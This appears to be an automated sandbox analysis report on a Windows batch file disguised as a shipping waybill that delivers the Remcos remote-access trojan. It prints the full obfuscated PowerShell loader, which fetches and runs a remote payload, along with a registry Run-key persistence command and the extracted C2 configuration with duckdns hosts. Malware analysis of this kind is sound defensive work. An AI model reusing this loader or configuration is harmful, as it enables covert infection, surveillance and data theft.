Overview

overview

10

Static

static

1

awb_shippi...24.bat

windows7-x64

10

awb_shippi...24.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28-11-2024 05:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    awb_shipping_post_28112024224782020031808174CN28112024000001124.bat

  • Size

    6KB

  • MD5

    f37fb720f0662ce5bac44b7e19b03864

  • SHA1

    daeac2db53e78b1139d1ef3351ecda6c66deb09e

  • SHA256

    df2cba523549cdb60b69c1de396325a4bf3d86d1013378a169273c4aa99d4da9

  • SHA512

    9aa63156cb66c548a0703c3f0a21d0e26d7939c62c0268b909e8c9ae3a1189753c3c0cec18e3e5e4cd806e4ea274e721faa0e41ee6cfd36a862ba581201b33fc

  • SSDEEP

    192:YEo+WKuRms3YnN5ekWwsQRbXwwgYTVVSGogXs3:DojPgs3UN5LWw7RDwwppjvc3

Score
10/10
remcosa$iandiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

A$ian

C2

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed1.duckdns.org:57483

iwarsut775laudryed2.duckdns.org:57484

iwarsut775laudryed3.duckdns.org:57484
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    hmbnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shibuetgtst-WMSLPY

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_28112024224782020031808174CN28112024000001124.bat"
    1⤵
    • System Network Configuration Discovery: Internet Connection Discovery
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden ";$Medallionist='Tyrosinase';;$Cream='Reedbirds';;$Gimmicker='Filterability';;$Branchiocardiac='Kanons176';;$Strandvejen178='Hysteranthous';;$Tagmemes=$host.Name;function Ignorher($brugeradgangskodes){If ($Tagmemes) {$Stillevejen=5} for ($Modifikationers=$Stillevejen;;$Modifikationers+=6){if(!$brugeradgangskodes[$Modifikationers]) { break }$Unring132+=$brugeradgangskodes[$Modifikationers]}$Unring132}function Bibeholdelsernes($Objektsprogs){ .($Tjenestemandsansats) ($Objektsprogs)}$Kulturbegivenheden=Ignorher ' PrednPlejeeTauroTP iap. BoxtwGravreNonsebmo otCAutokl RubbICoaduEStahlnPlurit';$Chiniofon=Ignorher 'Pto aM I dvoTrommzKoketiHightlHa.drl Yella Unlo/';$Untoppled=Ignorher 'FejlfTNervelSundhsOphng1 inge2';$Undervisningspligtige=' Fle.[ Ami NChumaERestaTpassb.TornoSSta leHonn.RC nseV Perui ndskc llegeExtinp Disaosar eiNoritnGaulltLettem.lgorAEidolNUoverAAfgifgSt laE An,eRUrete]Foutr:Snore:BefipS MuntEHavanCA.penutyt,erFatteIGenavTToxicYVrdigp GeneR.holao Co.gTRok,uoPortaCLambiO S inLDayr,=Vrlsl$ BedaUA,vernP mpetWh.weO eos PSquirpbkkenLBe,isEcarbuD';$Chiniofon+=Ignorher 'Dyrkn5Uafla.Be,an0Breto vold( erdeWEquiliJouncn SlavdCurreoHmoglwYderrs Slid ForskNA tacTSagso Diagr1Depri0Sid l. ocal0Emmar;Voksn BoniWRevyeiFidgenBalan6Gugge4Regnb;Frag anskuxAlec,6Undse4Impas; B ot Caulr depovNitra:Stvgr1 Sma.3 Pych1 Infl..asta0Nazif) Accu GendbGForbleKontocdanaik SereoBeslu/ V ri2Asfe 0Barry1Troph0.itha0Fremd1Tatte0 Indl1Perga KupezFOutwaiVallirSprineTur ufDuplioSjlstxbaadt/ ,ace1 Sv s3Graen1Di fu. Dep,0';$Sjussendes=Ignorher 'Moh iuDi trsSavoneKnstrRMilli-OblivAQuantgNettoeRevarnKlockT';$Styrtgodsets=Ignorher 'SoleuhBudbrtSt vbtReforpUnivesSens,: pbyd/Tai.b/EndodgSamm aDeplorAppethDrmmeounexcuIridod CostjC nado AbsquFor.br RomamSlids.PlaticBrekkospiramUnc a/Sv ngPTho,goSolnepElekt2Limfa.SkummpUdpolnJohangBundt>Leucoh BaketTurbetUnbeap.arens,xtem:G,nop/ Bank/Su.dogIn baaQuellrarterh Reduo Nomau ForfdEndowjLangboPrintuse vmrUngoamHjernoForfanInjuneVansk. Precc.malgo ummemTaluk/ L.nnPSve sowiss,pNonni2Inter.AfkorpHermenSne jg';$Tonguester=Ignorher 'Badme>';$Tjenestemandsansats=Ignorher 'LogicIKinesE ksax';$Reinspector='Udgiftsfringers';$Oplysningslinier='\Metoposcopist.Rat';Bibeholdelsernes (Ignorher ' Sprt$NonsyGDec,mlafmaloKildeBSemicASeptaLSorte:RaadsmTran aFerasg ByhanU.gkaUCitraSUdfldsHan oES adiN Peri=Seric$SquileDe.asnR flivAller:Aepy.AHan,npRok.ePFrostD FortaLogouTDoughASkild+ u,il$.enteOAfbrnpLejedLPhospYNdrinsMillinAtaliIRa iaNPro uGRuffeSForesLPab sIPredenpartrIU dereEchoiR');Bibeholdelsernes (Ignorher 'alkoh$YpperGModsiLjovilo D.bbb nweaAHder,lLimon: ,rbeh CatrU AurigCampauTowarEGalden ninoo PallT.impliFidusCKrage=Tolds$BrutasDerivTMascuYGuerdr.gesaTCroniGChylioSpis,D Aus.SMusc,eGoofyTOrmuzS,orfa. Ra iSEfterpFor,aLFrog I PicrTstad,( uadr$OverfT Tre OLeng,NOutdogSrgebuLefleE corssSengeT OcclENormaRKoste)');Bibeholdelsernes (Ignorher $Undervisningspligtige);$Styrtgodsets=$Huguenotic[0];$Verdensbermte245=(Ignorher 'Cheon$NovelgSimpllunderoPitwoBOncogA rednlHeath:SpragaLact gKonvorBarbaIAl.erOMobsmtFeder=A greNCauliEEng nWAvici-HeephostrafB AfvijTuetseFratecDorottBest GastrS co,sYOps,rS Phost paatE,atchMSupe.. Inte$ForsyKLadcyuNoninl EloxTGoldmuBortrr ,nylbYankeeSilliGSchwei elonvKompae orlenEteoch FolkeexfoddPrecoeKendeN');Bibeholdelsernes ($Verdensbermte245);Bibeholdelsernes (Ignorher 'M,sta$ AttiAEjbrigUndocrEquiniUvul,o Fr mtDefos. D.poH rudee CrosaMoha dCataseS,iffrRuykosDevil[Actin$ReiduSHobosjBhut uT ffesUtaalsMicr,e Cig n.ilstdHer ieEconosUnf o]Fibri= c ck$SimulChelinhGree i PsalnDdskniAnparoSi.rafC.stooLedevn');$Hjhusets=Ignorher 'Overd$ Occ AByporgKarenr.kskliCasbaoTascat Outr.ruelsDLiparoSneb,wAtominRediglHypo oBlinda nstad ci aFSc otiOptatl Re.se Reco( Kno $HaandSMiss tGallsy Ve nrAbductTrippgEvertoGraasd,onkosHarmoe howtYtri sMa,da,tagdr$DereaBHakkeoSkrivyG.llekOmhanoM.dbetNonsptSengeeImagetGloe )';$Boykottet=$Magnussen;Bibeholdelsernes (Ignorher 'Frans$OmganGTronaLFllesOFrbevbEurasACo lolG.aaf: B gsAHoldnCUdenlC ftee,hospPT rpeTExfetA Tingb Cer,ECo pllFinaltAkros=Drill(AnstatSa viESvngnsAnysrt,omfr-Lyna,pitha.aboyauT KippHInhab triak$StabsbDagspO JagtyIm ieK tubboPyttaT In itEmbryeHagerT Ency)');while (!$Acceptabelt) {Bibeholdelsernes (Ignorher 'S rut$Reo hg DebulCo,taosalutbS,aala lmenlUnsqu:HleriTWaferiBlgebl oreahAstrouLngd gSn.sdnPseudiGrandn rembgVejbye,dholrUn onnRestre ortr=Caval$ Sk,mMR kshaFy,stg L,vunFrosti Carbf.ygefiPalmec eside tjlen roct') ;Bibeholdelsernes $Hjhusets;Bibeholdelsernes (Ignorher 'Antabs ammotValueaPuppeRspekttHelti- ranssInterlPresaeInvenePunleP B st Orkid4');Bibeholdelsernes (Ignorher ' ala$Skittg NonsLBedr OLen tbS alsaZi.ziLpee.a: MowaA,illeC FletCGenneEJvnfrp ultit Pse.AAfd ibContreBronzlAnlgsTTh.gg=thirt(OpsugTSellaeVastisUsympTBlast-Je stPMarmoaIdenttHoptoh Mom. For k$ RaadbTubero PycnY UrteKG itao.chsaTFedtptWellfE t rbtFibov)') ;Bibeholdelsernes (Ignorher ' f de$togemG,recklBiogrOKommebRegneaDavidLForkr:ProvsSPosttkGra.daVrdigLTz,mmPMoul mUnco a yranrTangl=K ekr$Fere,GDisselG omoOTaberBBlomsADybdelMi ro:InterASurgefSerraHskaanvS,radlMicroeDi,soN rphadLu reESladrsSamle+ snor+Tramp% Tom $UrhnehFrem uN uriGStarsu SaedeUnethNSparrOban.uT langi AskeCTr ne.Non ecmurreOCitrou Fi rN Dry,t') ;$Styrtgodsets=$Huguenotic[$Skalpmar]}$Herbs=324054;$Grnsevrdi45=32132;Bibeholdelsernes (Ignorher 'Kamgr$Ph liGHono,LSpl,tOCellmB CirkAPegaslTruss:Gaf.ebNontyIDe,idl ContlOcellePresbdTe ses Nos,KUidenroversM SkefeAstak Unvar=,alat salivGDumbyeenspntDjrvh-D.ailCBriosoTemp.nCruxftMorgeESlut n Rvestreabb Achro$,nchobusmm oye.omYTuskhkYde los ueptSupe,TParaneUdf,yt');Bibeholdelsernes (Ignorher 'di ho$samiagNonmalBo asoSyst bRuskra C ndlPassi:UnoblLLoud,i UngarOverfiGrns,p oruri knlip Ra ieSupra Rotu =Gener Ha,d[SinicS valey BondsSvngntInhumeFor.smpetro. Mo eCAbreioArguinMonarvIldkueHewlerFladltCharc]Vamos:T wag:PhysaFAromarEskoroFlyvem aladB Sud.a Convs Rec,eBorgm6Panel4ZippeSPavektMaterrNontaiGuffenSkarngdevoi( oral$UnsouBSamoriMout.l FarvlTe dieInterd Tribs ModakUvsner G anm F ereEks,e)');Bibeholdelsernes (Ignorher 'Ka tr$Hyp rGClewsl UtilO .rivBT.nakaT.staLKaffe:Te efuInstaN SurrDInfert DoupAContrgDejagECloacL SterSPa lyeSkinds,emitBSpin eKvldeSLong,tFo.dme appmBu esMEucalEFasellBesviS redbE CubiN Vad. Jamb=Re en Melle[TriviSSu.styFla mS obultKrypte KmpemDkner.s.lgsT P steNaboiXN nlat uadr.Spunse DedenSyrneC Verso,odlyd Regei ForhnGnastgSelen]Menue:hemit:Sha tALitteSIllegC statI On,uiHiber.Centig ScarEpukleT KontSGr wntBrystr Midti KvinN R jsG Untr(Count$ DuodlF guriVurderR selIMindrpExtreIPens PA,parESuper)');Bibeholdelsernes (Ignorher ' ongr$MargiGAnascLNonavo Margb,rundAGuineLWivia: edlehB dknKJos pK Sto E orfaL RetsBDecusEUhyrlnCarroE BranSS,rot= snre$ no auMinicNindkodBuffeTS enkA.igmaGL gkaeSamfuLPrydesCw.ite Af aSUnderB.elviE Gal sHyb,iTUdst EDeglamR conmCume.eski oLPardasIsotoEHaloxN okse.MdeafsDest UBssesBNixonsNyblotExplaR,ysstIIndflnDoktogPolyp(Inter$ M.ndHK naleDelstR uoyeBRkedaSLling,Bla k$Gulchg Po trColomnProgrsArterE AcylvUb leRFertiDAbsceISkole4amtst5M ter)');Bibeholdelsernes $hkkelbenes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2720
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Medallionist='Tyrosinase';;$Cream='Reedbirds';;$Gimmicker='Filterability';;$Branchiocardiac='Kanons176';;$Strandvejen178='Hysteranthous';;$Tagmemes=$host.Name;function Ignorher($brugeradgangskodes){If ($Tagmemes) {$Stillevejen=5} for ($Modifikationers=$Stillevejen;;$Modifikationers+=6){if(!$brugeradgangskodes[$Modifikationers]) { break }$Unring132+=$brugeradgangskodes[$Modifikationers]}$Unring132}function Bibeholdelsernes($Objektsprogs){ .($Tjenestemandsansats) ($Objektsprogs)}$Kulturbegivenheden=Ignorher ' PrednPlejeeTauroTP iap. BoxtwGravreNonsebmo otCAutokl RubbICoaduEStahlnPlurit';$Chiniofon=Ignorher 'Pto aM I dvoTrommzKoketiHightlHa.drl Yella Unlo/';$Untoppled=Ignorher 'FejlfTNervelSundhsOphng1 inge2';$Undervisningspligtige=' Fle.[ Ami NChumaERestaTpassb.TornoSSta leHonn.RC nseV Perui ndskc llegeExtinp Disaosar eiNoritnGaulltLettem.lgorAEidolNUoverAAfgifgSt laE An,eRUrete]Foutr:Snore:BefipS MuntEHavanCA.penutyt,erFatteIGenavTToxicYVrdigp GeneR.holao Co.gTRok,uoPortaCLambiO S inLDayr,=Vrlsl$ BedaUA,vernP mpetWh.weO eos PSquirpbkkenLBe,isEcarbuD';$Chiniofon+=Ignorher 'Dyrkn5Uafla.Be,an0Breto vold( erdeWEquiliJouncn SlavdCurreoHmoglwYderrs Slid ForskNA tacTSagso Diagr1Depri0Sid l. ocal0Emmar;Voksn BoniWRevyeiFidgenBalan6Gugge4Regnb;Frag anskuxAlec,6Undse4Impas; B ot Caulr depovNitra:Stvgr1 Sma.3 Pych1 Infl..asta0Nazif) Accu GendbGForbleKontocdanaik SereoBeslu/ V ri2Asfe 0Barry1Troph0.itha0Fremd1Tatte0 Indl1Perga KupezFOutwaiVallirSprineTur ufDuplioSjlstxbaadt/ ,ace1 Sv s3Graen1Di fu. Dep,0';$Sjussendes=Ignorher 'Moh iuDi trsSavoneKnstrRMilli-OblivAQuantgNettoeRevarnKlockT';$Styrtgodsets=Ignorher 'SoleuhBudbrtSt vbtReforpUnivesSens,: pbyd/Tai.b/EndodgSamm aDeplorAppethDrmmeounexcuIridod CostjC nado AbsquFor.br RomamSlids.PlaticBrekkospiramUnc a/Sv ngPTho,goSolnepElekt2Limfa.SkummpUdpolnJohangBundt>Leucoh BaketTurbetUnbeap.arens,xtem:G,nop/ Bank/Su.dogIn baaQuellrarterh Reduo Nomau ForfdEndowjLangboPrintuse vmrUngoamHjernoForfanInjuneVansk. Precc.malgo ummemTaluk/ L.nnPSve sowiss,pNonni2Inter.AfkorpHermenSne jg';$Tonguester=Ignorher 'Badme>';$Tjenestemandsansats=Ignorher 'LogicIKinesE ksax';$Reinspector='Udgiftsfringers';$Oplysningslinier='\Metoposcopist.Rat';Bibeholdelsernes (Ignorher ' Sprt$NonsyGDec,mlafmaloKildeBSemicASeptaLSorte:RaadsmTran aFerasg ByhanU.gkaUCitraSUdfldsHan oES adiN Peri=Seric$SquileDe.asnR flivAller:Aepy.AHan,npRok.ePFrostD FortaLogouTDoughASkild+ u,il$.enteOAfbrnpLejedLPhospYNdrinsMillinAtaliIRa iaNPro uGRuffeSForesLPab sIPredenpartrIU dereEchoiR');Bibeholdelsernes (Ignorher 'alkoh$YpperGModsiLjovilo D.bbb nweaAHder,lLimon: ,rbeh CatrU AurigCampauTowarEGalden ninoo PallT.impliFidusCKrage=Tolds$BrutasDerivTMascuYGuerdr.gesaTCroniGChylioSpis,D Aus.SMusc,eGoofyTOrmuzS,orfa. Ra iSEfterpFor,aLFrog I PicrTstad,( uadr$OverfT Tre OLeng,NOutdogSrgebuLefleE corssSengeT OcclENormaRKoste)');Bibeholdelsernes (Ignorher $Undervisningspligtige);$Styrtgodsets=$Huguenotic[0];$Verdensbermte245=(Ignorher 'Cheon$NovelgSimpllunderoPitwoBOncogA rednlHeath:SpragaLact gKonvorBarbaIAl.erOMobsmtFeder=A greNCauliEEng nWAvici-HeephostrafB AfvijTuetseFratecDorottBest GastrS co,sYOps,rS Phost paatE,atchMSupe.. Inte$ForsyKLadcyuNoninl EloxTGoldmuBortrr ,nylbYankeeSilliGSchwei elonvKompae orlenEteoch FolkeexfoddPrecoeKendeN');Bibeholdelsernes ($Verdensbermte245);Bibeholdelsernes (Ignorher 'M,sta$ AttiAEjbrigUndocrEquiniUvul,o Fr mtDefos. D.poH rudee CrosaMoha dCataseS,iffrRuykosDevil[Actin$ReiduSHobosjBhut uT ffesUtaalsMicr,e Cig n.ilstdHer ieEconosUnf o]Fibri= c ck$SimulChelinhGree i PsalnDdskniAnparoSi.rafC.stooLedevn');$Hjhusets=Ignorher 'Overd$ Occ AByporgKarenr.kskliCasbaoTascat Outr.ruelsDLiparoSneb,wAtominRediglHypo oBlinda nstad ci aFSc otiOptatl Re.se Reco( Kno $HaandSMiss tGallsy Ve nrAbductTrippgEvertoGraasd,onkosHarmoe howtYtri sMa,da,tagdr$DereaBHakkeoSkrivyG.llekOmhanoM.dbetNonsptSengeeImagetGloe )';$Boykottet=$Magnussen;Bibeholdelsernes (Ignorher 'Frans$OmganGTronaLFllesOFrbevbEurasACo lolG.aaf: B gsAHoldnCUdenlC ftee,hospPT rpeTExfetA Tingb Cer,ECo pllFinaltAkros=Drill(AnstatSa viESvngnsAnysrt,omfr-Lyna,pitha.aboyauT KippHInhab triak$StabsbDagspO JagtyIm ieK tubboPyttaT In itEmbryeHagerT Ency)');while (!$Acceptabelt) {Bibeholdelsernes (Ignorher 'S rut$Reo hg DebulCo,taosalutbS,aala lmenlUnsqu:HleriTWaferiBlgebl oreahAstrouLngd gSn.sdnPseudiGrandn rembgVejbye,dholrUn onnRestre ortr=Caval$ Sk,mMR kshaFy,stg L,vunFrosti Carbf.ygefiPalmec eside tjlen roct') ;Bibeholdelsernes $Hjhusets;Bibeholdelsernes (Ignorher 'Antabs ammotValueaPuppeRspekttHelti- ranssInterlPresaeInvenePunleP B st Orkid4');Bibeholdelsernes (Ignorher ' ala$Skittg NonsLBedr OLen tbS alsaZi.ziLpee.a: MowaA,illeC FletCGenneEJvnfrp ultit Pse.AAfd ibContreBronzlAnlgsTTh.gg=thirt(OpsugTSellaeVastisUsympTBlast-Je stPMarmoaIdenttHoptoh Mom. For k$ RaadbTubero PycnY UrteKG itao.chsaTFedtptWellfE t rbtFibov)') ;Bibeholdelsernes (Ignorher ' f de$togemG,recklBiogrOKommebRegneaDavidLForkr:ProvsSPosttkGra.daVrdigLTz,mmPMoul mUnco a yranrTangl=K ekr$Fere,GDisselG omoOTaberBBlomsADybdelMi ro:InterASurgefSerraHskaanvS,radlMicroeDi,soN rphadLu reESladrsSamle+ snor+Tramp% Tom $UrhnehFrem uN uriGStarsu SaedeUnethNSparrOban.uT langi AskeCTr ne.Non ecmurreOCitrou Fi rN Dry,t') ;$Styrtgodsets=$Huguenotic[$Skalpmar]}$Herbs=324054;$Grnsevrdi45=32132;Bibeholdelsernes (Ignorher 'Kamgr$Ph liGHono,LSpl,tOCellmB CirkAPegaslTruss:Gaf.ebNontyIDe,idl ContlOcellePresbdTe ses Nos,KUidenroversM SkefeAstak Unvar=,alat salivGDumbyeenspntDjrvh-D.ailCBriosoTemp.nCruxftMorgeESlut n Rvestreabb Achro$,nchobusmm oye.omYTuskhkYde los ueptSupe,TParaneUdf,yt');Bibeholdelsernes (Ignorher 'di ho$samiagNonmalBo asoSyst bRuskra C ndlPassi:UnoblLLoud,i UngarOverfiGrns,p oruri knlip Ra ieSupra Rotu =Gener Ha,d[SinicS valey BondsSvngntInhumeFor.smpetro. Mo eCAbreioArguinMonarvIldkueHewlerFladltCharc]Vamos:T wag:PhysaFAromarEskoroFlyvem aladB Sud.a Convs Rec,eBorgm6Panel4ZippeSPavektMaterrNontaiGuffenSkarngdevoi( oral$UnsouBSamoriMout.l FarvlTe dieInterd Tribs ModakUvsner G anm F ereEks,e)');Bibeholdelsernes (Ignorher 'Ka tr$Hyp rGClewsl UtilO .rivBT.nakaT.staLKaffe:Te efuInstaN SurrDInfert DoupAContrgDejagECloacL SterSPa lyeSkinds,emitBSpin eKvldeSLong,tFo.dme appmBu esMEucalEFasellBesviS redbE CubiN Vad. Jamb=Re en Melle[TriviSSu.styFla mS obultKrypte KmpemDkner.s.lgsT P steNaboiXN nlat uadr.Spunse DedenSyrneC Verso,odlyd Regei ForhnGnastgSelen]Menue:hemit:Sha tALitteSIllegC statI On,uiHiber.Centig ScarEpukleT KontSGr wntBrystr Midti KvinN R jsG Untr(Count$ DuodlF guriVurderR selIMindrpExtreIPens PA,parESuper)');Bibeholdelsernes (Ignorher ' ongr$MargiGAnascLNonavo Margb,rundAGuineLWivia: edlehB dknKJos pK Sto E orfaL RetsBDecusEUhyrlnCarroE BranSS,rot= snre$ no auMinicNindkodBuffeTS enkA.igmaGL gkaeSamfuLPrydesCw.ite Af aSUnderB.elviE Gal sHyb,iTUdst EDeglamR conmCume.eski oLPardasIsotoEHaloxN okse.MdeafsDest UBssesBNixonsNyblotExplaR,ysstIIndflnDoktogPolyp(Inter$ M.ndHK naleDelstR uoyeBRkedaSLling,Bla k$Gulchg Po trColomnProgrsArterE AcylvUb leRFertiDAbsceISkole4amtst5M ter)');Bibeholdelsernes $hkkelbenes;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2148
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Skyggebillederne" /t REG_EXPAND_SZ /d "%Bestillingssiden% -windowstyle 1 $Kraasesuppe=(gp -Path 'HKCU:\Software\Claque\').Hingism;%Bestillingssiden% ($Kraasesuppe)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Skyggebillederne" /t REG_EXPAND_SZ /d "%Bestillingssiden% -windowstyle 1 $Kraasesuppe=(gp -Path 'HKCU:\Software\Claque\').Hingism;%Bestillingssiden% ($Kraasesuppe)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2932

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Metoposcopist.Rat
    Filesize

    463KB

    MD5

    f1e051f3aaa58d075d105694556aa551

    SHA1

    c9cc0b56985131d889fdadc263e708af200fe79c

    SHA256

    aa6882110f1bc455a4e6d61e443cb0930df88f089eabab30c56d8059b002a5b3

    SHA512

    e675f43ccf46a8e33ed344800c763f4d895c6af2e9b27ef49acd354eee7ac8ff5803b4926d199677b19b9428054fbdadec2985b9ad1b22b156478d36bb1c55dd

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6I40OXZIP87TBL5KQ8C3.temp
    Filesize

    7KB

    MD5

    4fc0bb4e2a220e8244001af2f94e933b

    SHA1

    2bc4206e1ff5534a65d67b14fd2a386b9c9eca85

    SHA256

    480cb0a9d6d5c713277b2c234ccf19d857d8bd6b2260c018662d0d6f89cf4826

    SHA512

    50258045f8a927eac9812ad41ee6881c4b7ebed988abaf17aeb0e8137732a7a2e91c85669f6a14e5ab3593cd384f18f6c7b9b1281d4d69dd8ae2d4b2c417e375

    Download Submit

  • memory/1984-18-0x0000000006590000-0x0000000009894000-memory.dmp

    Filesize

    51.0MB

    Download

  • memory/2148-35-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2148-19-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2720-10-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-4-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2720-11-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-9-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-14-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-8-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-7-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-6-0x0000000002720000-0x0000000002728000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2720-5-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

    Filesize

    2.9MB

    Download